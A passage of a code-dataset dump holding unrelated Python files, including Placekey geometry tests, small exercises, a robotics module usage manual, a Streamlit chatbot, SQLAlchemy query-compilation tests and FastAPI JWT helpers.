vertices. This check verifies\n # that the resulting polygons\n pk_poly = wkt_loads(pk_wkt)\n wkt_poly = wkt_loads(wkt)\n self.assertTrue(pk_poly.almost_equals(wkt_poly, decimal=12))\n\n def test_placekey_to_geojson(self):\n \"\"\"\n Test Placekey to GeoJSON conversion\n \"\"\"\n key = '@5vg-7gq-tvz' # centroid: (lat=37.77871308025089, long=-122.41907986670626)\n\n # Recall that GeoJSON specifies coordinates as (long, lat)\n geo_json = {\n 'type': 'Polygon',\n 'coordinates': ((\n (-122.41887301647432, 37.77804284141394),\n (-122.41823392242185, 37.77854904616886),\n (-122.41844077039543, 37.77921928451977),\n (-122.41928671932915, 37.77938331431949),\n (-122.41992580902914, 37.77887710717697),\n (-122.41971895414808, 37.77820687262237),\n (-122.41887301647432, 37.77804284141394)),)\n }\n pk_geojson = pk.placekey_to_geojson(key)\n try:\n self.assertEqual(pk_geojson, geo_json, 'correct GeoJSON conversion')\n except AssertionError:\n # Depending on the system there may be small variations in the least\n # significant digits of the polygon vertices. 
This check verifies\n # that the resulting polygons\n pk_poly = shape(pk_geojson)\n geojson_poly = shape(geo_json)\n self.assertTrue(pk_poly.almost_equals(geojson_poly, decimal=12))\n\n def test_placekey_format_is_valid(self):\n \"\"\"\n Test format validation for Placekeys\n \"\"\"\n self.assertTrue(pk.placekey_format_is_valid('5vg-7gq-tvz'),\n 'where with no @')\n self.assertTrue(pk.placekey_format_is_valid('@5vg-7gq-tvz'),\n 'where with @')\n self.assertTrue(pk.placekey_format_is_valid('zzz@5vg-7gq-tvz'),\n 'single tuple what with where')\n self.assertTrue(pk.placekey_format_is_valid('222-zzz@5vg-7gq-tvz'),\n 'double tuple what with where')\n self.assertTrue(pk.placekey_format_is_valid('2222-zzz@5vg-7gq-tvz'),\n 'long address encoding with where')\n self.assertTrue(pk.placekey_format_is_valid('222-zzzz@5vg-7gq-tvz'),\n 'long poi encoding with where')\n self.assertTrue(pk.placekey_format_is_valid('22222222-zzzzzzzzz@5vg-7gq-tvz'),\n 'long address and poi encoding with where')\n\n self.assertFalse(pk.placekey_format_is_valid('@abc'), 'short where part')\n self.assertFalse(pk.placekey_format_is_valid('abc-xyz'), 'short where part')\n self.assertFalse(pk.placekey_format_is_valid('abcxyz234'), 'no dashes')\n self.assertFalse(pk.placekey_format_is_valid('abc-345@abc-234-xyz'),\n 'padding character in what')\n self.assertFalse(pk.placekey_format_is_valid('ebc-345@abc-234-xyz'),\n 'replacement character in what')\n self.assertFalse(pk.placekey_format_is_valid('bcd-345@'),\n 'missing what part')\n self.assertFalse(pk.placekey_format_is_valid('22-zzz@abc-234-xyz'),\n 'short address encoding')\n self.assertFalse(pk.placekey_format_is_valid('222-zz@abc-234-xyz'),\n 'short poi encoding')\n\n self.assertFalse(pk.placekey_format_is_valid('@abc-234-xyz'), 'invalid where value')\n self.assertFalse(pk.placekey_format_is_valid('@@5vg-7gq-tvz'), 'multiple @ in placekey')\n\n def test_where_part_is_valid(self):\n \"\"\"\n Test validation of where parts\n \"\"\"\n self.assertTrue(pk._where_part_is_valid('5vg-7gq-tvz'),\n \"recognize valid where part\")\n self.assertFalse(pk._where_part_is_valid('5vg-7gq-tva'),\n \"recognize where part with invalid format\")\n self.assertFalse(pk._where_part_is_valid('zzz-zzz-zzz'),\n \"recognize where part with invalid h3 integer value\")\n\n\n def test_placekey_distance(self):\n \"\"\"\n Test distance computation between two Placekeys\n \"\"\"\n self.assertEqual(\n pk.placekey_distance(\n pk.geo_to_placekey(0.0, 0.0), pk.geo_to_placekey(0.0, 0.0)),\n 0.0,\n \"identical points have distance 0\")\n\n for i, sample in enumerate(self.distance_samples):\n difference = abs(\n pk.placekey_distance(sample['placekey_1'], sample['placekey_2']) -\n (sample['distance'] * 1000)\n )\n self.assertLessEqual(\n difference, 100,\n \"distances too far apart ({})\".format(i))\n\n def test_polygon_to_placekeys(self):\n \"\"\"\n Test generation of placekeys that intersect a polygon\n \"\"\"\n # Polygon is identical to the boundary of a single Placekey\n geo = (51.509865, -0.118092) # London\n poly = pk.placekey_to_polygon(pk.geo_to_placekey(*geo))\n keys_no_touching = pk.polygon_to_placekeys(poly, include_touching=False)\n keys_touching = pk.polygon_to_placekeys(poly, include_touching=True)\n\n self.assertCountEqual(\n keys_no_touching['interior'], ['@4hh-zvh-66k'],\n \"interior plackeys don't match\")\n self.assertCountEqual(\n keys_no_touching['boundary'], (),\n \"boundary plackeys don't match (no touching)\")\n self.assertCountEqual(\n keys_touching['boundary'],\n ('@4hh-zvh-649', 
'@4hh-zvh-ffz', '@4hh-zvh-fs5', '@4hh-zvh-6hq',\n '@4hh-zvh-gx5', '@4hh-zvh-6c5'),\n \"boundary plackeys don't match (touching)\")\n self.assertCountEqual(\n keys_no_touching['interior'], keys_touching['interior'],\n \"allow_touching flag doesn't impact interior\"\n )\n\n # Polygon contains no Placekey hexagons (it is a shrunk and translated\n # resolution 10 hexagon)\n poly = wkt_loads(\n 'POLYGON ((40.74001974100619 -73.9349274413473, '\n '40.73989965751763 -73.93565632113229, '\n '40.73939022508482 -73.93588138346178, '\n '40.73900088156213 -73.93537758083224, '\n '40.73912096147669 -73.93464871779295, '\n '40.73963038848786 -73.93442364063776, '\n '40.74001974100619 -73.9349274413473))')\n keys = pk.polygon_to_placekeys(poly)\n self.assertEqual(keys['interior'], (), \"no interior placekeys\")\n self.assertCountEqual(\n keys['boundary'],\n ('@627-s8p-vmk', '@627-s8p-xyv', '@627-s8p-xt9', '@627-s8p-vfz'),\n \"boundary placekey sets not equal\"\n )\n\n # This tests the WKT and GeoJSON wrappers\n geo = (41.2565, 95.9345)\n poly = pk.placekey_to_polygon(pk.geo_to_placekey(*geo)).buffer(0.01) # (lat, long)-tuples\n\n poly_keys = pk.polygon_to_placekeys(poly, include_touching=False, geo_json=False)\n\n wkt_keys = pk.wkt_to_placekeys(poly.wkt, include_touching=False, geo_json=False)\n\n # GeoJSON uses (long, lat) tuples. We'll test doing it both ways with the geo_json parameter.\n conformant_geojson_keys = pk.geojson_to_placekeys(\n transform(lambda lat, long: (long, lat), poly),\n include_touching=False,\n geo_json=True\n )\n\n non_conformant_geojson_keys = pk.geojson_to_placekeys(\n poly, include_touching=False, geo_json=False)\n\n self.assertCountEqual(poly_keys['interior'], wkt_keys['interior'],\n \"poly and wkt conversions' interiors don't match\")\n self.assertCountEqual(poly_keys['interior'], conformant_geojson_keys['interior'],\n \"poly and conformant geojson conversions' interiors don't match\")\n self.assertCountEqual(poly_keys['interior'], non_conformant_geojson_keys['interior'],\n \"poly and non-conformant geojson conversions' interiors don't match\")\n\n self.assertCountEqual(poly_keys['boundary'], wkt_keys['boundary'],\n \"poly and wkt conversions' interiors don't match\")\n self.assertCountEqual(poly_keys['boundary'], conformant_geojson_keys['boundary'],\n \"poly and conformant geojson conversions' interiors don't match\")\n self.assertCountEqual(poly_keys['boundary'], non_conformant_geojson_keys['boundary'],\n \"poly and non-conformant geojson conversions' interiors don't match\")\n","repo_name":"Placekey/placekey-py","sub_path":"placekey/tests/test_placekey.py","file_name":"test_placekey.py","file_ext":"py","file_size_in_byte":15379,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"53"} +{"seq_id":"19592683571","text":"#PROJECT EULER\r\n#P15: Lattice paths\r\n\r\n#Solved using permutation and combination(https://math.stackexchange.com/questions/286437/arrangement-of-binary-bits)\r\n\r\nimport math\r\nfrom math import factorial\r\nn=0\r\npaths =0\r\ndef num_grid(n):\r\n paths = factorial(n*2) / (factorial(n)**2)\r\n print(paths)\r\n\r\nprint(\"The number of paths in 20x20 grid are:\")\r\nnum_grid(20)\r\n","repo_name":"anishpai/Project-Euler","sub_path":"P15.py","file_name":"P15.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21631316169","text":"#-*-coding:utf-8-*-\n# 单例模式\nclass Car(object):\n __instace = None # 用于保存实例化的对象\n 
def __init__(self, name):\n self.name = name\n print('-----__init__方法被调用------')\n def __new__(cls, *k):\n print(\"--__new__方法被调用------\")\n if cls.__instace == None:\n cls.__instace = object.__new__(cls)\n return cls.__instace\n\nc1 = Car('c1')\nc2 = Car('c2')\nc3 = Car('c3')\nc4 = Car('c4')\nprint(id(c1))\nprint(id(c2))\nprint(id(c3))\nprint(id(c4))\n\n","repo_name":"nmww/p1804_ceshi","sub_path":"p1804_02高级/09-2018年6月13日异常-单例/p08_new创建魔法方法.py","file_name":"p08_new创建魔法方法.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"53"} +{"seq_id":"42824804013","text":"# Unit test example given.\n\nimport unittest\n\nfrom P1C11_mod import format_name\n\n\nclass NamesTestCase(unittest.TestCase):\n def test_first_last_name(self):\n formatted_name = format_name('janis', 'joplin')\n self.assertEqual(formatted_name, 'Janis Joplin')\n\n def test_first_last_middle(self):\n formatted_name = format_name('wolfgang', 'mozart', 'amadeus')\n self.assertEqual(formatted_name, 'Wolfgang Amadeus Mozart')\n\nif __name__ == '__main__':\n unittest.main()\n\n# 11-1,2\n\nfrom P1C11_mod import location\n\n\nclass TestLocation(unittest.TestCase):\n def test_city_country(self):\n description = location('boston', 'america')\n self.assertEqual(description, 'Boston, America')\n\n def test_city_country_pop(self):\n description = location('seattle', 'america', 1700000)\n self.assertEqual(description, 'Seattle, America - Population 1700000')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"bradythehuman/Python-Crash-Course","sub_path":"P1C11.py","file_name":"P1C11.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1964338813","text":"import os\n\nfrom textwrap import fill\nfrom textwrap import dedent\n\n\nclass UsageInstructor:\n \"\"\"\n Usage Instructor teaches basic module usage of PyMODI+.\n It mainly teachs what methods are available for each module.\n \"\"\"\n\n row_len = 79\n\n def __init__(self):\n self.bundle = None\n self.led = None\n self.button = None\n\n @staticmethod\n def clear():\n clear_cmd = \"cls\" if os.name == \"nt\" else \"clear\"\n os.system(clear_cmd)\n\n def print_wrap(self, msg):\n message = fill(dedent(msg), self.row_len).lstrip()\n print(message)\n\n def print_topic(self, module_type):\n print(\"-\" * self.row_len)\n topic = f\"Usage Manual {module_type}\"\n print(f\"{topic:^{self.row_len}}\")\n print(\"-\" * self.row_len)\n\n def run_usage_manual(self):\n self.clear()\n print(\"=\" * self.row_len)\n print(f\"= {'Welcome to PyMODI+ Usage Manual':^{self.row_len - 4}} =\")\n print(\"=\" * self.row_len)\n\n selection = dedent(\n \"\"\"\n Modules available for usage:\n 1. Button\n 2. Dial\n 3. Env\n 4. Imu\n 5. Joystick\n 7. Tof\n 8. Display\n 9. Led\n 10. Motor\n 11. 
Speaker\n \"\"\"\n )\n print(selection)\n module_nb = int(input(\n \"Enter the module index (0 to exit) and press ENTER: \"\n ))\n self.clear()\n\n if not (0 <= module_nb <= 11):\n print(\"ERROR: invalid module index\")\n os._exit(0)\n\n run_selected_manual = {\n 0: self.exit,\n 1: self.run_button_manual,\n 2: self.run_dial_manual,\n 3: self.run_env_manual,\n 4: self.run_imu_manual,\n 5: self.run_joystick_manual,\n 7: self.run_tof_manual,\n 8: self.run_display_manual,\n 9: self.run_led_manual,\n 10: self.run_motor_manual,\n 11: self.run_speaker_manual,\n }.get(module_nb)\n run_selected_manual()\n\n #\n # Usage manuals for each module\n #\n def exit(self):\n os._exit(0)\n\n def run_button_manual(self):\n self.print_topic(\"Button\")\n\n print(dedent(\n \"\"\"\n import modi_plus\n\n bundle = modi_plus.MODIPlus()\n button = bundle.button[0]\n\n while True:\n if button.clicked:\n print(f\"Button({button.id}) is clicked!\")\n if button.double_clicked:\n print(f\"Button({button.id}) is double clicked!\")\n if button.pressed:\n print(f\"Button({button.id}) is pressed!\")\n if button.toggled:\n print(f\"Button({button.id}) is toggled!\")\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_dial_manual(self):\n self.print_topic(\"Dial\")\n print(dedent(\n \"\"\"\n import modi_plus\n\n bundle = modi_plus.MODIPlus()\n dial = bundle.dials[0]\n\n while True:\n print(f\"Dial ({dial.id}) turn: {dial.turn}\")\n print(f\"Dial ({dial.id}) speed: {dial.speed}\")\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_env_manual(self):\n self.print_topic(\"Env\")\n print(dedent(\n \"\"\"\n import modi_plus\n\n bundle = modi_plus.MODIPlus()\n env = bundle.envs[0]\n\n while True:\n print(f\"Env ({env.id}) intensity: {env.intensity}\")\n print(f\"Env ({env.id}) temperature: {env.temperature}\")\n print(f\"Env ({env.id}) humidity: {env.humidity}\")\n print(f\"Env ({env.id}) volume: {env.volume}\")\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_imu_manual(self):\n self.print_topic(\"Imu\")\n print(dedent(\n \"\"\"\n import modi_plus\n\n bundle = modi_plus.MODIPlus()\n imu = bundle.imus[0]\n\n while True:\n print(f\"Gyro ({imu.id}) roll: {imu.roll}\")\n print(f\"Gyro ({imu.id}) pitch: {imu.pitch}\")\n print(f\"Gyro ({imu.id}) yaw: {imu.yaw}\")\n print(f\"Gyro ({imu.id}) angular_vel_x: {imu.angular_vel_x}\")\n print(f\"Gyro ({imu.id}) angular_vel_y: {imu.angular_vel_y}\")\n print(f\"Gyro ({imu.id}) angular_vel_z: {imu.angular_vel_z}\")\n print(f\"Gyro ({imu.id}) acceleration_x: {imu.acceleration_x}\")\n print(f\"Gyro ({imu.id}) acceleration_y: {imu.acceleration_y}\")\n print(f\"Gyro ({imu.id}) acceleration_z: {imu.acceleration_z}\")\n print(f\"Gyro ({imu.id}) vibration: {imu.vibration}\")\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_joystick_manual(self):\n self.print_topic(\"Joystick\")\n print(dedent(\n \"\"\"\n import modi_plus\n\n bundle = modi_plus.MODIPlus()\n joystick = bundle.joysticks[0]\n\n while True:\n print(f\"Joystick ({joystick.id}) x: {joystick.x}\")\n print(f\"Joystick ({joystick.id}) y: {joystick.y}\")\n print(f\"Joystick ({joystick.id}) direction: {joystick.direction}\")\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_tof_manual(self):\n self.print_topic(\"Tof\")\n print(dedent(\n \"\"\"\n import modi_plus\n\n bundle = modi_plus.MODIPlus()\n tof = bundle.tofs[0]\n\n while True:\n print(f\"ToF ({tof.id}) distance: 
{tof.distance}\")\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_display_manual(self):\n self.print_topic(\"Display\")\n print(dedent(\n \"\"\"\n import modi_plus\n\n bundle = modi_plus.MODIPlus()\n display = bundle.displays[0]\n\n # Set text to display, you can check the text being displayed\n display.set_text(\"Hello World!\")\n\n # Check what text has been displayed currently (in program)\n print(f\"Display ({display.id}) text: {display.text})\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_led_manual(self):\n self.print_topic(\"Led\")\n print(dedent(\n \"\"\"\n import modi_plus\n import time\n\n bundle = modi_plus.MODIPlus()\n\n led = bundle.leds[0]\n\n # Turn the led on for a second\n led.set_rgb(100, 100, 100)\n time.sleep(1)\n\n # Turn the led off for a second\n led.set_rgb(0, 0, 0)\n time.sleep(1)\n\n # Turn red on for a second\n led.set_rgb(100, 0, 0)\n time.sleep(1)\n\n led.set_rgb(0, 0, 0)\n\n # Turn green on for a second\n led.set_rgb(0, 100, 0)\n time.sleep(1)\n\n led.set_rgb(0, 0, 0)\n\n # Turn blue on for a second\n led.set_rgb(0, 0, 100)\n time.sleep(1)\n\n led.set_rgb(0, 0, 0)\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_motor_manual(self):\n self.print_topic(\"Motor\")\n print(dedent(\n \"\"\"\n import modi_plus\n import time\n\n bundle = modi_plus.MODIPlus()\n motor = bundle.motors[0]\n\n motor.set_angle(0, 70)\n time.sleep(1)\n\n motor.set_angle(60, 70)\n time.sleep(1)\n\n print(f\"motor ({motor.id}) angle: {motor.angle}\")\n\n motor.set_speed(20)\n time.sleep(1)\n\n print(f\"motor ({motor.id}) speed: {motor.speed}\")\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_speaker_manual(self):\n self.print_topic(\"Speaker\")\n print(dedent(\n \"\"\"\n import modi_plus\n import time\n\n bundle = modi_plus.MODIPlus()\n speaker = bundle.speakers[0]\n\n speaker.set_tune(\"SOL6\", 50)\n time.sleep(1)\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n","repo_name":"LUXROBO/pymodi-plus","sub_path":"modi_plus/util/usage_util.py","file_name":"usage_util.py","file_ext":"py","file_size_in_byte":8548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19552207202","text":"from flask import url_for\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_login import LoginManager\n\n\ndb = SQLAlchemy()\nmigrate = Migrate()\n\n\ndef configure_sqlalchemy(app):\n db.init_app(app)\n migrate.init_app(app, db)\n\n\nlogin_manager = LoginManager()\n\n\ndef configure_login_manager(app):\n login_manager.init_app(app)\n login_manager.login_view = url_for(\"auth.login\")\n\n\ndef configure_template(app):\n @app.context_processor\n def inject_context():\n return {\n \"admin_sidebar\": app.config.get(\"ADMIN_SIDEBAR\"),\n \"admin_name\": app.config.get(\"APP_NAME\"),\n \"enumerate\": enumerate,\n }\n","repo_name":"magiskboy/flask-cms","sub_path":"cms/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1393136138","text":"#import libs\r\nimport openai \r\nimport streamlit as st\r\nimport io\r\nimport docx\r\nimport pandas as pd\r\nfrom transformers import GPT2TokenizerFast\\\r\n\r\n\r\n# pip install streamlit-chat \r\nfrom streamlit_chat import message\r\n\r\nopenai.api_key = 
st.secrets['openai-secret']\r\n\r\n#add title to \r\nst.title(\"chatBot : OpenAI\")\r\n\r\n#Initialising session\r\nif 'generated' not in st.session_state:\r\n st.session_state['generated'] = []\r\n\r\nif 'past' not in st.session_state:\r\n st.session_state['past'] = []\r\n\r\nif 'history' not in st.session_state:\r\n st.session_state['history'] = []\r\n\r\nif 'uploadKey' not in st.session_state:\r\n st.session_state['uploadKey'] = 1\r\n\r\ndef generate_response(prompt):\r\n chat = openai.ChatCompletion.create(\r\n model=\"gpt-3.5-turbo\",\r\n messages= prompt\r\n )\r\n return chat['choices'][0]['message']['content']\r\n\r\n#Form for user input\r\ndef update():\r\n st.session_state.text += st.session_state.text_value\r\n\r\n\r\nuploaded_file = st.file_uploader(\"Choose a CSV file\", key=st.session_state['uploadKey'])\r\nif uploaded_file is not None:\r\n df = pd.read_csv(uploaded_file)\r\n st.write(df)\r\n\r\nuser_input = st.text_input('Enter your prompt and click on submit', value=\"\", key='text_value')\r\n\r\n#Get user response\r\nif uploaded_file is not None and user_input != \"\":\r\n #Get user response\r\n user_input = user_input + df.to_json()\r\n st.session_state['uploadKey'] += 1\r\n\r\nif user_input:\r\n \r\n #Store the input\r\n st.session_state.history.append({\"role\": \"user\", \"content\": user_input})\r\n\r\n #Generate the response\r\n output = generate_response(st.session_state['history'])\r\n\r\n #Store the chat\r\n st.session_state.past.append(user_input)\r\n st.session_state.generated.append(output)\r\n st.session_state.history.append({\"role\": \"assistant\", \"content\": output})\r\n\r\n# Create an instance of a word document\r\ndef list_to_word_doc(items, doc_name):\r\n doc = docx.Document()\r\n for item in items:\r\n doc.add_paragraph(item)\r\n return doc\r\n\r\n#Chat history downloader\r\ndoc_download = list_to_word_doc(st.session_state['history'], 'chat_history')\r\n\r\nbio = io.BytesIO()\r\ndoc_download.save(bio)\r\nif doc_download:\r\n st.download_button(\r\n label=\"Download Chat History\",\r\n data=bio.getvalue(),\r\n file_name=\"chat_history.docx\",\r\n mime=\"docx\"\r\n )\r\n\r\n#display no of tokens\r\n#tokenizer = GPT2TokenizerFast.from_pretrained(\"gpt2\")\r\n#number_of_tokens = len(tokenizer(''.join(st.session_state['history']))['input_ids'])\r\n\r\n#st.text('Number of tokens left: '+ str(max_tokens - number_of_tokens))\r\n\r\nif st.session_state['generated']:\r\n \r\n for i in range(len(st.session_state['generated'])-1, -1, -1):\r\n message(st.session_state[\"generated\"][i], key=str(i))\r\n message(st.session_state['past'][i], is_user=True, key=str(i) + '_user')\r\n","repo_name":"CodaLeon/CSVChatGPT","sub_path":"csvChatGPT.py","file_name":"csvChatGPT.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5378893046","text":"import os, sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../..\"))\nimport unittest\nfrom linked_list.list_node import ListNode\nfrom linked_list.palindrome_list import PalindromeList\n\nclass TestPalindromeList(unittest.TestCase):\n def setUp(self):\n self.func = PalindromeList()\n\n def test_1(self):\n head = ListNode.build([1, 2])\n self.assertFalse(self.func.isPalindrome(head))\n\n def test_2(self):\n head = ListNode.build([1, 2, 2, 1])\n self.assertTrue(self.func.isPalindrome(head))\n\nif __name__ == '__main__':\n 
unittest.main()","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/test/linked_list_test/test_palindrome_list.py","file_name":"test_palindrome_list.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35151188961","text":"import enum\nimport json\nimport logging\nimport uuid\nfrom functools import partial\n\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\nfrom sqlalchemy.sql.ddl import CreateTable, DropTable\n\nfrom asyncpgsa import connection\n\nfile_table = sa.Table(\n 'meows', sa.MetaData(),\n sa.Column('id'),\n sa.Column('id_1'),\n)\n\n\nclass NameBasedEnumType(sa.types.TypeDecorator):\n impl = sa.types.Enum\n\n def __init__(self, enum_cls, **opts):\n assert issubclass(enum_cls, enum.Enum)\n self._opts = opts\n self._enum_cls = enum_cls\n enums = (m.name for m in enum_cls)\n super().__init__(*enums, **opts)\n\n def process_bind_param(self, value, dialect):\n return value.name if value else None\n\n def process_result_value(self, value: str, dialect):\n return self._enum_cls[value] if value else None\n\n def copy(self):\n return NameBasedEnumType(self._enum_cls, **self._opts)\n\n\nclass FileTypes(enum.Enum):\n TEXT = 0\n PNG = 1\n PDF = 2\n\n\nfile_type_table = sa.Table(\n 'meows2', sa.MetaData(),\n sa.Column('type', NameBasedEnumType(FileTypes)),\n sa.Column('name', sa.String(length=128)),\n)\n\n\ndef test_compile_query():\n ids = list(range(1, 4))\n query = file_table.update() \\\n .values(id=None) \\\n .where(file_table.c.id.in_(ids))\n q, p = connection.compile_query(query)\n assert q == 'UPDATE meows SET id=$1 WHERE meows.id IN ($2, $3, $4)'\n assert p == [None, 1, 2, 3]\n\n\ndef test_compile_text_query():\n sql = sa.text('SELECT :id, my_date::DATE FROM users').params(id=123)\n q, p = connection.compile_query(sql)\n assert q == 'SELECT $1, my_date::DATE FROM users'\n assert p == [123]\n\n\ndef test_compile_query_with_custom_column_type():\n query = file_type_table.insert().values(type=FileTypes.PDF)\n q, p = connection.compile_query(query)\n assert q == 'INSERT INTO meows2 (type) VALUES ($1)'\n assert p == ['PDF']\n\n\ndef test_compile_query_debug(caplog):\n \"\"\"Validates that the query is printed to stdout\n when the debug flag is enabled.\"\"\"\n ids = list(range(1, 3))\n query = file_table.update() \\\n .values(id=None) \\\n .where(file_table.c.id.in_(ids))\n\n with caplog.at_level(logging.DEBUG, logger='asyncpgsa.query'):\n results, _ = connection.compile_query(query)\n msgs = [record.msg for record in caplog.records]\n assert results in msgs\n\n\ndef test_compile_query_no_debug(caplog):\n \"\"\"Validates that no output is printed when\n the debug flag is disabled.\"\"\"\n ids = list(range(1, 3))\n query = file_table.update() \\\n .values(id=None) \\\n .where(file_table.c.id.in_(ids))\n\n with caplog.at_level(logging.WARNING, logger='asyncpgsa.query'):\n results, _ = connection.compile_query(query)\n msgs = [record.msg for record in caplog.records]\n assert results not in msgs\n\n\ndef test_compile_jsonb_with_custom_json_encoder():\n jsonb_table = sa.Table(\n 'meowsb', sa.MetaData(),\n sa.Column('data', postgresql.JSONB),\n )\n\n class JSONEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, uuid.UUID):\n return str(o)\n else:\n return super().default(o)\n\n dialect = connection.get_dialect(\n json_serializer=partial(json.dumps, cls=JSONEncoder)\n )\n\n data = {\n 'uuid4': uuid.uuid4(),\n }\n query = 
jsonb_table.insert().values(data=data)\n q, p = connection.compile_query(query, dialect=dialect)\n assert q == 'INSERT INTO meowsb (data) VALUES ($1)'\n assert p == ['{\"uuid4\": \"%s\"}' % data['uuid4']]\n\n\nddl_test_table = sa.Table(\n 'ddl_test_table', sa.MetaData(),\n sa.Column('int_col', sa.Integer),\n sa.Column('str_col', sa.String),\n)\n\ndef test_compile_create_table_ddl():\n create_statement = CreateTable(ddl_test_table)\n result, params = connection.compile_query(create_statement)\n assert result == (\n '\\nCREATE TABLE ddl_test_table (\\n\\tint_col'\n ' INTEGER, \\n\\tstr_col VARCHAR\\n)\\n\\n'\n )\n assert len(params) == 0\n\n\ndef test_compile_drop_table_ddl():\n drop_statement = DropTable(ddl_test_table)\n drop_query, params = connection.compile_query(drop_statement)\n assert drop_query == '\\nDROP TABLE ddl_test_table'\n assert len(params) == 0\n","repo_name":"CanopyTax/asyncpgsa","sub_path":"tests/test_connection.py","file_name":"test_connection.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":411,"dataset":"github-code","pt":"53"} +{"seq_id":"10503983327","text":"import tempfile, os, os.path\nimport pyfaidx as fa\n\nimport nucleotides.filesystem as fs\n\n\ndef filter_contig_file(src_path, min_length):\n \"\"\"\n Filters a FASTA file containing contigs. Removes all contigs whose length is\n less than the supplied min length parameter.\n \"\"\"\n tmp = tempfile.mktemp(prefix = 'nucleotides_filtered_contigs')\n with open(tmp, 'w') as f:\n for contig in fa.Fasta(src_path):\n if len(contig) > min_length:\n f.write('>' + str(contig.long_name) + \"\\n\")\n for line in contig:\n f.write(str(line) + \"\\n\")\n digest = fs.sha_digest(tmp)\n dst = os.path.join(os.path.dirname(src_path), digest) + '.fa'\n os.remove(src_path)\n os.remove(src_path + '.fai')\n os.rename(tmp, dst)\n return dst\n","repo_name":"nucleotides/nucleotides-client","sub_path":"nucleotides/bio.py","file_name":"bio.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8802698138","text":"import os\nfrom datetime import datetime, timedelta\nfrom fastapi import Depends, HTTPException, status\nfrom fastapi.security import OAuth2PasswordBearer\nfrom jose import jwt, JWTError\nfrom typing import Union\nfrom models.user import UserModel\nfrom pydantic import BaseModel\n\n\nACCESS_TOKEN_EXPIRE_MINUTES = 30 # 30 minutes\nALGORITHM = \"HS256\"\nJWT_SECRET_KEY = os.environ['JWT_SECRET_KEY'] # should be kept secret\n\n\ndef create_access_token(data: dict):\n to_encode = data.copy()\n expire = datetime.utcnow() + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)\n to_encode.update({\"exp\": expire})\n to_encode.update({**data, \"exp\": expire})\n encoded_jwt = jwt.encode(to_encode, JWT_SECRET_KEY, ALGORITHM)\n\n return encoded_jwt\n\ndef decodeJWT(token: str) -> dict:\n try:\n print(token)\n decoded_token = jwt.decode(token, JWT_SECRET_KEY, algorithms=[ALGORITHM])\n print(decoded_token)\n print(decoded_token['exp'])\n print(decoded_token['exp'] >= datetime.utcnow())\n return decoded_token if decoded_token['exp'] >= datetime.utcnow() else None\n except:\n return {}\n\ndef get_user_info_by_token(token: str):\n # remove bearer from token\n token = token[7:]\n try:\n decoded_token = jwt.decode(token, JWT_SECRET_KEY, algorithms=[ALGORITHM])\n return decoded_token['username'], decoded_token['company']\n except:\n return None, None\n\n\nclass Token(BaseModel):\n access_token: 
str\n token_type: str\n\n\nclass TokenData(BaseModel):\n email: Union[str, None] = None\n\noauth2_scheme = OAuth2PasswordBearer(\n tokenUrl=\"/login\",\n scheme_name=\"JWT\"\n)\n\n\nasync def get_current_user(token: str = Depends(oauth2_scheme)):\n credentials_exception = HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Could not validate credentials\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n try:\n payload = jwt.decode(token, JWT_SECRET_KEY, algorithms=[ALGORITHM])\n email: str = payload.get(\"sub\")\n if email is None:\n raise credentials_exception\n token_data = TokenData(email=email)\n except JWTError:\n raise credentials_exception\n user = UserModel.get_user_by_email(email=token_data.email)\n if user is None:\n raise credentials_exception\n return user\n","repo_name":"Faripod/fastapi_mongo_url_shortner","sub_path":"app/utils/jwt.py","file_name":"jwt.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32941351232","text":"from typing import Any, Iterable, Union\n\nfrom aiohttp import ClientResponse, client_exceptions, http_exceptions, web_exceptions\nfrom marshmallow import EXCLUDE\n\nfrom aiosnow.exceptions import (\n ErrorResponse,\n 